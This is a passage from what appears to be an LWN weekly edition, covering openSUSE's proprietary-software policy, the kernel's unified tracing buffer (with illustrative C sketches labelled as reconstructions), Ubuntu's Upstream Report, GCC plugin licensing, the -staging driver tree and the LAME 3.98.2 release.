like an excellent choice as a platform. 


For those puzzled by the name, "pwn" is used for the word "own" in the "leetspeak" used by many
in the security community—both white and black hat.  Breaking into
and controlling a network or system is then "pwning" it.  NeoPwn is not
alone in using the term.  Metasploit author H D Moore's iPwn Mobile makes
UMPC-based penetration testing devices.


Both the NeoPwn and iPwn Mobile's Infiltrator look like useful
devices for those needing an off-the-shelf solution, but because they are
based on free software, the core capabilities are available to those with a
lower budget.
By showing what can be done with open mobile phones like the FreeRunner,
NeoPwn is doing a great service for both OpenMoko and the free software
community.  Undoubtedly various malicious folks will get their hands on
devices like this, so it is important that security researchers and
professionals have access to them as well.


		openSUSE and the distribution of proprietary software


Every Linux distributor must find its own peace when it comes to the issue
of proprietary software.  Some distributors will avoid anything non-free to
the point of tearing firmware out of the kernel.  Others, like Fedora or
Debian, will not include any non-free code.  Distributors like Ubuntu are
rather more
willing to facilitate the use of non-free software, but even they are, perhaps,
not 100% comfortable with it.  And distributions like Xandros positively
embrace proprietary code.


OpenSUSE (like SuSE Linux before it) has traditionally taken a position
which is relatively friendly toward proprietary software.  It was only in
2006 that Novell announced its intention to stop
shipping non-GPL kernel modules, but it never made any such promises with
regard to user space.  So a typical openSUSE installation disk includes a
number of proprietary goodies, including the Adobe Flash player, a number
of fonts, ARCAD, the Acrobat PDF reader, the Opera web browser, RealPlayer,
and more.  


The presence of all this proprietary code is unwelcome to some users, of
course, but it has another interesting effect: it requires that openSUSE be
distributed with an end-user license
agreement which has some very un-free-software-like terms.  Among other
things, it reads:


	Novell reserves all rights not expressly granted to You. You may
	not: (1) reverse engineer, decompile, or disassemble the Software
	except and only to the extent it is expressly permitted by
	applicable law or the license terms accompanying a component of the
	Software; or (2) transfer the Software or Your license rights under
	this Agreement, in whole or in part.


In other words, redistribution of the openSUSE DVD is not permitted.
Members of the openSUSE mirror network are, technically, in violation of
the EULA, though nobody appears to be in a hurry to call them on that.
But the EULA raises eyebrows and makes some users uncomfortable; many
people got into free software to avoid dealing with agreements like that. 


The need for the EULA, rather than problems with proprietary software in
general, is causing developers at Novell to reconsider which packages
should go onto an openSUSE DVD.  To that end, Novell product manager
Michael Löffler has proposed a new
scheme whereby the DVD would only contain redistributable software
(including proprietary software, such as firmware, which allows
redistribution).  The openSUSE project would set up a network-based
repository from which other proprietary applications could be installed;
the installer would then install a couple of packages (the Adobe Flash
player and Fluendo's MP3 codec) by default.


The end result for most users would be the same: an openSUSE installation
with both free and proprietary software.  At least, that would be the case
for users with a decent network connection.  But those users would also
gain a DVD with a much less restrictive EULA allowing the DVD to be
redistributed at will.  (The current plan is to still have an agreement for
trademark control and warranty disclaimer reasons, even though other
software distributors have managed to eliminate EULAs for those purposes). 
At this point, it would also be easy to add an
option to simply skip the configuration of the non-free repository for
users who want a "clean" installation.

Most responses to this proposal have been positive.  The happiness is not
universal, though; one user complained:


	I don't think Novell, openSUSE and us should be influenced by "bad
	press" of doubt quality and change what is a key point of openSUSE:
	offering also proprietary software ready to go on the DVD.  Moving
	these packages to an online repository makes no difference from
	downloading and installing them by hand.


It is true that one-stop shopping has long been a feature of the SUSE
distribution.  And a
recent survey [PDF] suggests that a significant portion of the openSUSE
user base makes use of at least a few of the proprietary tools included
there.  If the presence of this code is truly a "key point" of openSUSE,
then taking it out could risk upsetting users at a time when, by some
accounts, the visibility of this distribution is already dropping. 

This risk would be mitigated by a couple of factors, though.  One is that
the need to download those packages over the net is not much of a stopping
point for most users.  After all, people installing Linux from a CD or DVD
have usually resigned themselves to a massive download of package updates
after the first boot anyway.  Tossing a few more packages into that
download - assuming they weren't set to be updated by then anyway - is not
going to change the experience in any significant way.

But the other relevant point is that the need for much of this proprietary
code is decreasing.  Java used to be a big part of the openSUSE
proprietary software load, but Java is now free.  Your editor cannot
remember when he last encountered a PDF file which could not be managed by
at least one free viewer - though, evidently, such files do still
exist.  Perhaps the biggest remaining problem is Flash; progress is being
made there, but Flash is most certainly not a solved problem.  Beyond that,
though, there are few situations indeed where a proprietary application is
really needed for ordinary tasks.

The openSUSE distribution is not distancing itself from proprietary
software at this time; it is just reorganizing its management of that
software to address one of the problems it brings.  But it is still hard to
avoid the temptation to read between the lines and look forward to a day when
openSUSE, too, distributes only free software - not as a result of any sort
of push for purity, but just because its users no longer have any need for
anything else.

		Low-level tracing plumbing


Kernel and user-space tracing were heavily discussed at both the kernel
summit and the Linux Plumbers Conference.  Attendees did not emerge from
those discussions with any sort of comprehensive vision of how the tracing
problem will be solved; there is not, yet, a consensus on that point.  But
one clear message did come out: we may end up with several different
tracing mechanisms in the kernel, but there is no patience for redundant
low-level tracing buffer implementations.  All of the potential tracing
frameworks are going to have to find a way to live with a single mechanism
for collecting trace data and getting it to user space.


This conclusion may look like a way of diverting attention from the
intractable problems at the higher levels and, instead, focusing everybody
on something so low-level that the real issues disappear.  There may be
some truth to that.  It is also true, though, that there is no call for
duplicating the same sort of machinery across several different tracing
frameworks; coming up with a common solution to this part of the problem
can only lead to a better kernel
in the long run.  But there is another objective here which is just as
important: having all the tracing frameworks using a single buffer allows
them to be used together.  It is not hard to imagine a future tracing tool
integrating information gathered with simultaneous use of ftrace, LTTng,
SystemTap, and other tracing tools that have not been written yet.  Having
all of those tools using the same low-level plumbing should make that
integration easier.


With that in mind, Steven Rostedt set out to create a new, unified tracing
buffer; as of this writing, that patch was already up to its tenth
iteration.  A casual perusal of the patch might well leave a reader
confused; it takes 2000 lines of relatively complex code to implement
what is, in the end, just a circular buffer.  This circular buffer is not
even suitable for use by tracing frameworks yet; a separate "tracing"
layer is to
be added for that.  The key point here is that, with tracing code,
efficiency is crucially important.  One of the main use cases for tracing
is to debug performance problems in highly stressed production
environments.  A heavyweight tracing mechanism will create an observer
effect which can obscure the situation which called for tracing in the
first place, disrupt the production use of the system, or both.  To be
accepted, a tracing framework must have the smallest possible impact on the
system.


So the unified trace buffer patch applies just about every known trick to
limit its runtime cost.  The circular buffer is actually a set of per-CPU
buffers, each of which allows lockless addition and consumption of events.
The event format is highly compact, and
every effort is made to avoid copying it, ever.  Rather than maintain a
separate structure to track the contents of an individual page in the
buffer, the patch employs yet another overloaded variant of struct
page in the system memory map.  (Your editor would not want to be the
next luckless developer who has to modify struct page and, in the
process, track down and fix all of the tricky
not-really-struct-page uses throughout the kernel.)  And so on.

The patch itself does a fairly good job of describing the trace buffer API;
that discussion will not be repeated here.  It is worth taking a quick look
at the low-level event format, though:


This format was driven by the desire to keep the per-event overhead as
small as possible, so there is a single 32-bit word of header information.
Here, type is the type of the event, len is its length
(except when it's not, see below), time_delta is a time
offset value, and array contains the actual event data.

There are four types of events; one of them (RINGBUF_TYPE_PADDING)
is just a way of filling out empty space at the end of a page.  Normal
events generated by the tracing system (RINGBUF_TYPE_DATA) have a
length given by the len field, which is right-shifted by two
bits.  So the maximum event length is 28 bytes (32 bytes minus four for the
header word), which is not very long.  For longer events, len is
set to zero and the first word of the array field contains the
real length.
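
The layout described above can be sketched in C roughly as follows.  This
is a reconstruction from the prose rather than a copy of the patch: the
field widths (2, 3, and 27 bits) are inferred from the four event types,
the 28-byte limit, and the 27-bit time delta, while the enum values and the
rb_set_length() and rb_get_length() helpers are hypothetical names
invented for the illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Event types named in the text; the numeric values are assumptions. */
enum ringbuf_type {
	RINGBUF_TYPE_PADDING,
	RINGBUF_TYPE_TIME_EXTENT,
	RINGBUF_TYPE_TIME_STAMP,
	RINGBUF_TYPE_DATA,
};

/* One 32-bit header word followed by the event payload. */
struct ring_buffer_event {
	uint32_t type:2, len:3, time_delta:27;
	uint32_t array[];
};

#define RB_ALIGNMENT	4U	/* lengths are stored in four-byte units */
#define RB_MAX_SMALL	28U	/* largest length the 3-bit field can hold */

/* Hypothetical helper: record a payload length in a data event header. */
static void rb_set_length(struct ring_buffer_event *ev, uint32_t bytes)
{
	uint32_t rounded;

	assert(bytes <= UINT32_MAX - (RB_ALIGNMENT - 1));
	rounded = (bytes + RB_ALIGNMENT - 1) & ~(RB_ALIGNMENT - 1);

	ev->type = RINGBUF_TYPE_DATA;
	if (rounded > 0 && rounded <= RB_MAX_SMALL) {
		ev->len = rounded >> 2;	/* stored right-shifted by two bits */
	} else {
		ev->len = 0;		/* real length goes in array[0] */
		ev->array[0] = rounded;
	}
}

/* Hypothetical helper: recover the payload length in bytes. */
static uint32_t rb_get_length(const struct ring_buffer_event *ev)
{
	return ev->len ? (uint32_t)ev->len << 2 : ev->array[0];
}
```

In this sketch a 10-byte payload is rounded up to 12 bytes and stored as
len = 3, while a 100-byte payload stores zero in len and puts 100 into the
first word of array.  Bitfield packing is compiler-dependent, so the
four-byte header is an assumption that holds with GCC on common
architectures.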

The other two event types have to do with time stamps.  Over the course of
the discussion, it became clear that high-resolution timing information is
needed with all events, for two reasons.  The recording of events into
per-CPU arrays, while essential for performance, does have the effect of
separating events which are related in time; the addition of precise
timekeeping will allow events to be collated in the proper order.  That
collation could be handled through some sort of serial counter, but some
performance issues can only be understood by looking closely at the precise
timing of specific events.  So events need to have real time data, at the highest
resolution which is practical.
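
To make the collation step concrete, here is a minimal sketch of how a
reader might merge per-CPU event streams back into time order.  Nothing in
it comes from the patch: struct trace_event, struct cpu_stream, and
next_event() are hypothetical, and each per-CPU stream is assumed to be
already sorted by its time stamp.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical decoded event carrying an absolute time stamp. */
struct trace_event {
	uint64_t ts;
	int cpu;
	int id;
};

/* Hypothetical read cursor over one CPU's (time-ordered) events. */
struct cpu_stream {
	const struct trace_event *events;
	size_t count;
	size_t next;
};

/*
 * Return the earliest unread event across all streams and advance that
 * stream's cursor; return NULL once every stream has been drained.
 */
static const struct trace_event *next_event(struct cpu_stream *streams,
					    size_t ncpus)
{
	struct cpu_stream *best = NULL;
	size_t i;

	assert(streams != NULL || ncpus == 0);
	for (i = 0; i < ncpus; i++) {
		struct cpu_stream *s = &streams[i];

		if (s->next == s->count)
			continue;	/* this CPU has nothing left */
		if (!best || s->events[s->next].ts < best->events[best->next].ts)
			best = s;
	}
	return best ? &best->events[best->next++] : NULL;
}
```

Calling next_event() repeatedly yields the events of all CPUs in time stamp
order.  A serial counter in place of ts would give the same ordering, but,
as noted above, it would lose the timing information itself.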

Just how that data will be recorded is still unclear, and may end up being
architecture dependent.  Some systems may use timestamp counter data
directly, while others may be able to provide real times in nanoseconds.
Whatever format turns out to be used, there is no doubt that it will
require 64 bits of storage.  But most of the time data is redundant between
any two events, so there is no real desire to add a full 64-bit time stamp
to every event in the stream.  The compromise which was reached was to
store the amount of time which passes between one event and the next in the
27 bits allotted.  Should the time delta be too large to fit in that space,
the trace buffer code will insert an artificial event (of type
RINGBUF_TYPE_TIME_EXTENT) to provide the necessary storage space. 
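
The delta scheme can be illustrated with a short sketch.  The 27-bit limit
comes from the text; everything else is an assumption, including the
struct ts_encoding record, the encode_delta() and decode_delta() names, and
the choice to carry the whole delta in the extra event while the following
data event stores zero.  The patch may split the value differently.

```c
#include <assert.h>
#include <stdint.h>

#define TS_DELTA_BITS	27
#define TS_DELTA_MAX	((UINT64_C(1) << TS_DELTA_BITS) - 1)

/* Hypothetical record of what would be written for one event. */
struct ts_encoding {
	int      needs_extent;	/* nonzero: emit a time-extent event first */
	uint64_t extent_delta;	/* delta carried by that extra event */
	uint32_t header_delta;	/* value stored in the 27-bit header field */
};

/* Encode the time elapsed since the previous event on this CPU. */
static struct ts_encoding encode_delta(uint64_t prev_ts, uint64_t now_ts)
{
	struct ts_encoding enc = { 0, 0, 0 };
	uint64_t delta;

	assert(now_ts >= prev_ts);	/* per-CPU time assumed monotonic */
	delta = now_ts - prev_ts;

	if (delta <= TS_DELTA_MAX) {
		enc.header_delta = (uint32_t)delta;
	} else {
		/* Too large for 27 bits: fall back to the artificial event. */
		enc.needs_extent = 1;
		enc.extent_delta = delta;
	}
	return enc;
}

/* Reader side: rebuild the absolute time stamp from the previous one. */
static uint64_t decode_delta(uint64_t prev_ts, struct ts_encoding enc)
{
	return prev_ts + enc.extent_delta + enc.header_delta;
}
```

If the time unit turned out to be nanoseconds, 27 bits would cover gaps of
up to about 134 milliseconds between events on one CPU, so the extra event
would only be needed after a comparatively long quiet period.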

The final event type (RINGBUF_TYPE_TIME_STAMP) "will hold data to
help keep the buffer timestamps in sync."  This little bit of functionality
has not yet been implemented, though.

The rate of change of the trace buffer code appears to be slowing somewhat
as comments from various directions are addressed; it may be getting close
to its final form.  Then it will be a matter of implementing the
higher-level protocols on top of it.  In the meantime, though, the
attentive reader may be wondering: what about relayfs?  The relay code has
been in the kernel for years, and it was intended to solve just this kind
of problem.

The most direct (if not most politic) answer to that question was probably posted by
Peter Zijlstra:


	Dude, relayfs is such a bad performing mess that extending it seems
	like a bad idea. Better to write something new and delete
	everything relayfs related.


Deleting relayfs would not be that hard; there are only a couple of users,
currently.  But relayfs developer Tom Zanussi is not convinced that the problems with
relayfs are severe enough to justify tossing it out and starting over.  He
has posted a series of patches cleaning up
the relayfs API and addressing some of its performance problems.  At this
point, though, it is not clear that anybody is really looking at that work;
it has not received much in the way of comments.

One way or the other, the kernel seems set to have a low-level trace buffer
implementation in place soon.  That just leaves a few other little problems
to solve, including making dynamic tracing work, instrumenting the kernel
with static trace points, implementing user-space tracing, etc.  Working
those issues out is likely to take a while, and it is likely to result in a
few different tracing solutions aimed at different needs.  But we'll have
the low-level plumbing, and that's a start.

		Ubuntu debuts its Upstream Report


Ubuntu has taken some heat over the years for its relationship with
upstream projects, but the distribution seems determined to change that
impression.  To that end, Ubuntu has started by
looking at bugs and bug reporting between the distribution and upstream
projects.  The visible result is the beta release of the Ubuntu Upstream
Report, which displays the progress of getting bugs upstream.


Users of Ubuntu report lots of bugs in the software they use but, for the
most part, those bugs aren't in any way specific to Ubuntu; they tend to
also exist in the upstream project.  Ubuntu collects its bugs at Canonical's Launchpad web site, which allows linking
those bugs to bugs in the bug tracking system of an upstream project.  Once
the link—or watch as it is called in Launchpad—is
established, updates to the upstream bug's status will be reflected in the
Ubuntu bug as well.


That capability has been available for some time, but as Ubuntu looked at
ways to improve how well their bugs were flowing upstream, they needed a
way to measure how well watches were being used.  Canonical's Ubuntu
community manager Jono Bacon describes the idea behind the report:


In terms of this project, I was keen to see graphs that show the number of
upstream bug linkages going on, the total number of open vs. upstream bugs
and how many bugs are fixed elsewhere. We could use these graphs to
determine our progress in improving our bug workflow, but this was not
enough - we also needed raw data about which projects needed the most
focus. Which projects were struggling the most with bug figures? Which
projects were not forwarding bugs upstream? Which projects didn't have an
upstream bug tracker registered in Launchpad? We had all the answers to
these questions in Launchpad, but no means of gathering them. To fix this,
we created the Ubuntu Upstream Report. 


The report ranks Ubuntu projects by the number of open bugs, while also
showing how many have progressed towards upstream.  Bugs in Ubuntu get
triaged by the Ubuntu bug team, with some of them getting classified as
"upstream"—meaning that they exist in the project itself, rather than
just Ubuntu's build.  Upstream bugs that are linked to a bug in the
project's bug tracker are considered "watch" bugs.  Each successive stage
shows the difference from the previous one, both as a number and as a
percentage, so that it is easy to see how bugs are being handled as well as
where the bottlenecks are.  This dashboard-style interface also allows
sorting by column and retrieving lists of bugs by following the numeric
links. 


The report was created by Jorge Castro, who is in charge of external project
developer relations for Canonical.  The tool has multiple uses, as Castro
explains:


We wanted to provide a tool that not only shows upstreams how well we're
linking and forwarding bugs, but a day-to-day tool for maintainers to see
where there are targets of opportunity to forward to upstream. And lastly,
for triagers we wanted to provide real-time working "bug lists" that you
can work through if you want to help be the bridge that connects the
downstream Ubuntu Package to the upstream project. 


Part of the idea is for the report to be used by participants in Ubuntu's
5-A-Day initiative.  5-A-Day
is an effort to make the Ubuntu bug list better by encouraging users and
developers to work on five bugs each day.  Users can do things like try to
reproduce the bug, clean up the report, and add more information to it,
while developers can triage bugs or look at patches to the upstream project
to see if they are needed for Ubuntu.  The report will also help those
who are running or participating in Bug Jams—focused
efforts to gather people together to move Ubuntu bugs along.


Linking to existing upstream bugs or creating new ones for problems that
Ubuntu users find can be helpful for projects.  Some projects will find it
more helpful than others, as Bacon notes:

If we do link a bug upstream, we had no firm idea how useful an upstream
actually find our bug data. Our discussions suggested very mixed reactions
- a small project is likely to have a very different perspective on bugs
than a large project. Just think about this in purely quantitative states -
a small project will likely get fewer bugs, and these bugs can probably be
dealt with by a small collection of volunteers. This is unlikely to scale
to something like the Linux kernel or OpenOffice.org.


One of the problems, of course, is the one-way nature of the watch
link: Ubuntu sees changes to the upstream bug, but the reverse is not
true, so projects have to come looking in Launchpad for updates.
There is also resistance to using Launchpad because it is not free software,
though that is slated
to change by mid-2009.  Overall, this new report and the focus on
improving upstream relations are very welcome, but tracking bugs only goes so
far; fixing upstream bugs is an important, but missing, piece.


In order to not be seen as just a consumer of upstream software, one needs
to not only report bugs, but fix them as well.  For all of the various
bug-related efforts that Ubuntu is sponsoring, there is very little mention
of actually fixing problems and sending patches upstream.  There are tools
like Harvest that make it
easier to find upstream patches—bug fixes and enhancements for
possible inclusion in the Ubuntu packages—but
the focus is clearly on improving Ubuntu, as opposed to improving the
software ecosystem that makes up the distribution.


It is important to remember that
the efforts so far are just a start; Ubuntu is working on additional
projects to improve its upstream relations.  One gets the sense that they
have heard the criticisms and are working to address them.  Like it
or not, Ubuntu has its own way of doing things which may mean it takes
longer than some would like, but it certainly looks to be headed in the
right direction.


		Plugging into GCC


Almost one year ago, LWN examined
the GCC plugin mechanism - or, more exactly, the lack of such a
mechanism.  Despite the increasing level of interest in adding
special-purpose modules to the GCC compiler, GCC has no API which allows
this addition to be done.  So developers working on GCC extensions are
faced with the daunting prospect of patching their code directly into the
compiler.  This situation looked unlikely to change; the Free Software
Foundation's fear that a plugin mechanism would be used by proprietary
extensions was just too strong.  One year later, though, things look a
little different; there may be a plugin-capable GCC available in the
(relatively) near future.

There are a lot of good reasons for wanting to add plugins to the GCC
compiler.  The implementation of better optimization techniques is an
obvious example, but there is more than that.  The EDoc++ project has put together a
static analysis tool which performs checking of exception handling in C++
code - and generates documentation while it's at it.  Mozilla uses its Dehydra tool to find
potential problems in the browser's code base.  The LLVM compiler can be thought of as a sort of
GCC plugin, currently.  The Middle End Lisp
Translator project is working on a Lisp-like language which, in turn,
can be used within plugins for static analysis and code transformations.
The list goes on; just about any project working on
the processing of programs can benefit from hooking into the GCC platform.

The concern that has long been expressed by the FSF (which owns the
copyrights on GCC) is that a general plugin mechanism would make it
possible for companies to traffic in binary-only GCC modules.  Rather than
contribute a new analysis or optimization tool - or a new language - to the
community, companies might have an incentive to distribute their work
separately under a restrictive license.  That runs very much counter to
what the FSF is trying to accomplish, so opposition from that direction is
not particularly surprising.

But the pressure for some sort of plugin API is not going away, so the GCC
developers have been thinking about ways to make it possible without
upsetting Richard Stallman.  One alternative which has been discussed is to
require plugins to be written in a high-level scripting language - Python
or Perl, perhaps.  Then plugins would, for all practical purposes, have to
be distributed in source form.  Even if they carried a hostile license, it
would be possible to study them and learn how they actually work.

Another possibility is to take a page from the Linux kernel's book and keep
the plugin API unstable.  If the API changed with every GCC release, GCC
would become a moving target which would be much harder for proprietary
vendors to keep up with.  An unstable API may be the way things go in any
case - there may be no other way to allow GCC itself to continue to
progress quickly - but experience with the kernel shows that an unstable
API is not, by itself, enough to scare off a determined proprietary
software vendor.  It might reduce the number of proprietary GCC modules,
but it would not eliminate them.

Alternatively, one could require plugin modules to declare their license to
the GCC core, which could then reject plugins that lack a suitable
license.  Again, experience with the kernel suggests that there are limits
to how far one can get with this approach.  Proprietary plugin vendors
could distribute a version of GCC with the license check patched out - or
just have their plugin lie about its license.
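
The license-declaration idea, and its weakness, can be shown in a few
lines.  This is purely a sketch: no GCC plugin API exists at this point, so
struct plugin_info, the accepted_licenses list, and plugin_license_ok() are
all hypothetical, loosely modeled on the way kernel modules declare their
licenses.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical descriptor a plugin would export to the compiler core. */
struct plugin_info {
	const char *name;
	const char *license;	/* self-declared; nothing verifies it */
};

/* Hypothetical list of license strings the core is willing to load. */
static const char *const accepted_licenses[] = { "GPL", "GPLv3", "LGPL" };

/* Return 1 if the plugin's declared license is on the accepted list. */
static int plugin_license_ok(const struct plugin_info *p)
{
	size_t i;
	size_t n = sizeof(accepted_licenses) / sizeof(accepted_licenses[0]);

	assert(p != NULL);
	if (p->license == NULL)
		return 0;	/* no declaration at all: reject */
	for (i = 0; i < n; i++)
		if (strcmp(p->license, accepted_licenses[i]) == 0)
			return 1;
	return 0;
}
```

A plugin declaring "Proprietary" would be rejected here, but a proprietary
plugin that simply declares "GPL" passes the same check, which is exactly
the limitation described above.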

Yet another possibility is to not worry about the problem at all; it is not
clear that the world is full of vendors waiting for an opportunity to abuse
a GCC plugin API.  As GCC developer Ian Lance Taylor puts it:


	The FSF doesn't want plugins because they are concerned that people
	will start distributing proprietary plugins to gcc.  I personally
	think this is a fear from twenty years ago which shows a lack of
	understanding of today's compiler market, but, that said, the FSF
	wants to cover themselves for the future as well.


Someday, perhaps, the FSF will feel sufficiently confident to allow
unrestricted plugin access to GCC, but that does not appear to be in the
cards at this time.

What does appear to be happening, though, is an attempt to enable
plugins by way of some licensing trickery.  The GCC suite is covered by the
GPL, a fact which does not, in itself, affect the licensing of any program
which is compiled by GCC.  But GCC is more than just the compiler; it also
includes a runtime library needed to make most GCC-compiled programs
actually run.  Linking to the runtime library could cause the resulting
program to be a derived product of that library; since the runtime library
is licensed under the GPL, that could be a concern for anybody compiling
non-GPL-licensed code.  To address that concern, the runtime code has long
carried an exception to the GPL:


	As a special exception, you may use this file as part of a free
	software library without restriction.  Specifically, if other files
	instantiate templates or use macros or inline functions from this
	file, or you compile this file and link it with other files to
	produce an executable, this file does not by itself cause the
	resulting executable to be covered by the GNU General Public
	License.  This exception does not however invalidate any other
	reasons why the executable file might be covered by the GNU General
	Public License.


That is the language which enables the distribution of proprietary software
built with GCC.  The plan, said to be under consideration currently,
is to change the wording of that exception; essentially, it would no longer
apply to code compiled with the use of proprietary GCC plugins.  The new
license is not finalized, but Mr. Taylor guesses it will look something like this:


	[I]f you modify gcc by adding GPL-incompatible software used to
	generate code, it is likely that you will not be granted any
	exception to the GPL when using the runtime library.  In other
	words, if you 1) add an optimization pass to gcc using the
	(hypothetical) plugin architecture, and 2) that optimization pass
	is not licensed under a GPL-compatible license, and 3) you generate
	object code using that optimization pass, and 4) you link that
	generated object code with the gcc runtime library (e.g., libgcc or
	libstdc++-v3), then you will not be permitted to distribute the
	resulting executable except under the terms of the GPL.


The actual wording of the new runtime license has been a long time in
coming; the FSF's lawyers want to get it right so that it discourages
undesired conduct while staying out of the way for everybody else.  It also
does not appear to be the FSF's highest priority at the moment.  So
nobody really knows when it might become official - though there have been
notes to the list suggesting that it could happen in the near future.

What we do seem to know is that it will happen, sooner or later, and the
addition of a plugin mechanism to GCC will become possible.  So the
developers are starting to think about how the API will work.  There are a
couple of existing GCC plugin frameworks already, and plenty of thoughts on
how they could be improved; see, for example, this discussion for an idea of what is being
talked about.  But the details are likely to be of interest mostly to GCC
hackers, while the end result will be beneficial to a much wider community
of developers and users.

		Moving the -staging tree


Greg Kroah-Hartman was tagged as the "maintainer of crap" at this year's Kernel Summit for his
willingness to shepherd drivers of lower quality into the mainline.  He has
not shrunk from that label when introducing a patch set that would merge some
of those drivers.  In fact, he has embraced the label: as part of his
patch, he introduced the 
TAINT_CRAP flag for use in tainting kernels that load these, well,
crappy drivers.


There has been an ongoing
struggle between those who want to see drivers get included as quickly
as possible versus those who want to see them approach or attain normal
kernel quality levels first.  Kroah-Hartman started the -staging tree last June as a way
to increase the visibility, and thus the testing and bug fixing, of out-of-tree
drivers.  Because drivers in that tree have been steadily
improving—to the point where several have graduated to the
mainline—the belief is that moving -staging itself into the mainline
kernel will result in even faster progress.


So, Kroah-Hartman has introduced a new directory (drivers/staging)
to hold these drivers, as well as a mechanism to automatically taint the
kernel if any of them get loaded.  That will warn users when loading the
module—at least if they check their logs—and include that info
in any oops message that the kernel might produce.  Kernel hackers can then
filter out problems depending on what the taint is; problems in kernels
tainted with binary-only drivers, for instance, are generally actively
ignored.
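
The tainting mechanism amounts to setting a bit in a global mask and
letting whoever reads a bug report decide which bits they care about.  The
sketch below is a user-space model, not the patch: the bit positions, the
struct module_desc descriptor, and the load_module() and worth_debugging()
helpers are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Taint bits; the positions here are illustrative, not from the patch. */
enum taint_flag {
	TAINT_PROPRIETARY_MODULE = 0,
	TAINT_CRAP               = 1,
};

static unsigned long tainted_mask;

static void add_taint(enum taint_flag flag)
{
	tainted_mask |= 1UL << flag;
}

static int is_tainted(enum taint_flag flag)
{
	return (tainted_mask >> flag) & 1UL;
}

/* Hypothetical description of a module being loaded. */
struct module_desc {
	const char *name;
	int from_staging;	/* lives under drivers/staging */
	int proprietary;	/* binary-only module */
};

/* Loading a module taints the kernel according to where it came from. */
static void load_module(const struct module_desc *m)
{
	assert(m != NULL);
	if (m->from_staging)
		add_taint(TAINT_CRAP);
	if (m->proprietary)
		add_taint(TAINT_PROPRIETARY_MODULE);
}

/* A developer picks the taints to ignore and filters reports with them. */
static int worth_debugging(unsigned long mask, unsigned long ignored)
{
	return (mask & ignored) == 0;
}
```

A developer who does not want to look at staging-related reports would
pass a mask containing the TAINT_CRAP bit as ignored; others can choose to
look anyway, since the taint only records a fact about what was loaded.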


Getting those drivers into the mainline, though, will make it much easier
for folks who want to test them.  In addition, clean-ups and fixes
for the drivers will go in as mainline patches, raising the
visibility of the developers working on them.  The change should have very
minimal impact on other kernel users and developers.  In particular,
developers will not 
have to worry about reflecting API changes into drivers/staging as
Kroah-Hartman will keep them up-to-date.


The main complaint about the proposal has
been that it
duplicates the functionality or intent of the EXPERIMENTAL flag.
There was also some belief that tainting the kernel was unduly harsh, but
as Kroah-Hartman points out: "It
isn't costing 
anything, and if a developer doesn't want to debug the kernel if such a
driver is loaded, this allows them to do this." 


As part of the thread, Paul Mundt explains why
EXPERIMENTAL has no meaning in the kernel today:

EXPERIMENTAL today is pretty damn meaningless. What it tends to mean in
practice is that somethings needs some more testing, someone wants to be
able to pull out the EXPERIMENTAL card when someone enables their option
and their kernel blows up, the option/feature hasn't been around in the
kernel for that long, or someone has just been too lazy to remove the
flag (this last one probably covers about 90% of in-tree cases today).
Stuff that is actively broken (in case of your kernel blowing up, not
building, etc.) tends to be shoved under BROKEN instead.


Mundt goes on to show that almost all of the default configurations enable
CONFIG_EXPERIMENTAL, further reducing its meaning.  It would
be nice to audit all of the uses and restore the meaning of the flag, but
that is beyond the scope of what Kroah-Hartman has set out to do.  There
still would be a difference, though, even if EXPERIMENTAL were meaningful.
Mundt continues:

The other key difference is that even with experimental stuff in the
kernel, you will still get support, so it's not really a taintable
offense. Stuff in staging/ on the other hand while potentially not
actively hostile against the rest of the system, is still very much an
unknown, and therefore the only safe thing to do is to taint the system
and allow individual developers to make a choice regarding whether any
resulting oopses are worth looking at or not.


There are still some who are concerned about adding
less-than-kernel-quality code. Randy 
Dunlap puts it this way: "I think that we
have enough quality problems without adding crap."  But Linus Torvalds
has always been solidly in the "merge early" camp, so this proposal 
seems likely to go in for 2.6.28.  Besides, as
Stefan Richter notes: 

OTOH many if not most of the -staging drivers are ones which are 
already in use.  Their users already deal with whatever quality problems 
these drivers have, in addition to having to fight with the installation 
hassles that are inherent to out-of-tree drivers.


In a fairly short span of time, merging drivers into the mainline has
gotten a whole lot easier.  At one time, developers might have to work on a
driver for several development cycles before it reached a quality level
that would allow it to be merged.  In the interim, the -staging tree
made things easier and more visible for testers and developers; soon that
visibility will rise substantially again.


		LAME ain't lame no more


LAME (Lame Ain't an MP3 Encoder) is a long-running open-source MP3
encoder project.  From the About LAME document:
"...LAME is the source code for a fully LGPL'd MP3 encoder, with speed and quality to rival and often surpass all commercial competitors.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3. LAME is not for everyone - it is distributed as source code only and requires the ability to use a C compiler. However,
many popular
ripping and encoding programs include the LAME encoding engine..."


The LAME project has announced the first release in several years:
"After rough[ly] two years of development, the LAME project has released a new version (3.98.2) of the best-known Open Source MP3 encoder.
All users are encouraged to use it, see new improvements regarding the previous releases and send feedback for the project."


LAME has a long and interesting development history.
From the LAME home page:
"LAME development started around mid-1998. Mike Cheng started it as a patch against the 8hz-MP3 encoder sources. After some quality concerns raised by others, he decided to start from scratch based on the dist10 sources. His goal was only to speed up the dist10 sources, and leave its quality untouched. That branch (a patch against the reference sources) became Lame 2.0, and only on Lame 3.81 did we replaced of all dist10 code, making LAME no more only a patch.
The project quickly became a team project. Mike Cheng eventually left leadership and started working on tooLame, an MP2 encoder. Mark Taylor became leader and started pursuing increased quality in addition to better speed. He can be considered the initiator of the LAME project in its current form. He released version 3.0 featuring
gpsycho,
a new psychoacoustic model he developed.
In early 2003 Mark left project leadership, and since then the project has been lead through the cooperation of the active developers (currently 4 individuals)."  Numerous additional
developers have contributed to the project.


The slightly out-of-date project version history documents the changes to
the code since September 1998.
Improvements added to version 3.98 (started in May, 2007) include:

Numerous bug fixes were implemented.
A lot of code cleanup was done.
Support was added for newer versions of various libraries.
Many build system improvements were done.
The RPM specification was updated.
Numerous changes were made to the lame front end switches.
New VBR code, derived from the NSPSY psymodel, was added.
There were changes to the new VBR psymodel.
The out of bits strategy for the newer VBR code was overhauled.
PCM WAVE_FORMAT_EXTENSIBLE support was added.
Support for ID3v2 total track count was added.
ID3v2 TLEN support was added.
The ATH adjustment was improved for low volume cases.
A new SSE version of the FFT code was used.
A flush option was added for flushing the output stream in lame.exe.
The FFTSSE and FFT3DNOW assembler code was back ported from the Lame4 branch.


